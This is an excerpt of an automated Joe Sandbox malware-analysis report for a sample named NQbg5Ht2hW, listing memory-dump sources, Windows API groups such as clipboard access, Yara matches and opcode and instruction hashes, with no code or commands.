                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                        • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                                                                                                                                                                                        • API String ID: 2610073882-1114116150
                                                                                                                                                                                                                                                                        • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                        • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                        • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                        • Instruction ID: c093014eba8c0e7137c82b9263658b81341d9f1d973a392d5462e8967f24bf57
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D5107F1D086528FD700AB78C4493AEBFE0AB41310F048638E99587396D37D99A587A3